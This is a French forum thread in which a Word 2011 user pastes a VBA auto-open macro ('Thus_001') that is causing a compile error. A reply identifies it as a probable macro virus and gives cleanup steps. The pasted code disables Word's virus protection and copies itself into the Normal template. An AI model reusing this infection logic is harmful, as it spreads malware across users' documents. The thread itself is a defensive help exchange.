word 2011 erreur de compilation

verhulst

Membre confirmé
1 Octobre 2009
25
2
bonjour a tous
je viens de passer d office 2004 a office 2011, mais depuis j'ai un problème avec word 2011
j'ai le message suivant
erreur de compilation
membre de méthode ou de données introuvable.
voici le message du visual basic

Private Sub Document_Open()
'Thus_001'
'Anti-Virus'
' This virus is an alteration of a virus which was
Set prevDocument = ActiveDocument
Set nextDocument = NormalTemplate
On Error Resume Next
Application.Options.VirusProtection = False
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Anti-Virus'" Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
.CodeModule.CountOfLines
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
.CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
.Item(1).CodeModule.CountOfLines)
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save

Merci a vous

j'ai le message suivant
erreur de compilation
membre de méthode ou de données introuvable.
voici le message du visual basic

Private Sub Document_Open()
'Thus_001'
'Anti-Virus'
' This virus is an alteration of a virus which was
Set prevDocument = ActiveDocument.../...
Quelle est cette macro à déclenchement automatique à l'ouverture, qui l'a installée et pour quelle raison ? Je n'aime pas trop un module à lancement automatique qui s'assure de bien désactiver la protection contre les macros... :siffle:

Si ce n'est pas toi qui l'as installé, si tu ne sais pas ce que c'est, quitte Word, supprime ton document "Normal.dotm" ainsi que le document "Normal" de Word 2004. Ensuite, relance Word et va dans les préférences pour t'assurer que la protection contre les macros virus est bien activée. Tu aurais probablement intérêt à faire un test avec un antivirus courant (genre l'outil de Sophos, gratuit pour une utilisation personnelle).

Ton installation aurait révélé un macro-virus qui passait inaperçu jusque là que ça ne m'étonnerait pas, d'après ces lignes de code...

Il n'est par ailleurs pas nécessaire de désinstaller Office 2004, la cohabitation ne pose pas de problème particulier (j'ai la collection complète, v.X, 2004, 2008 et 2011).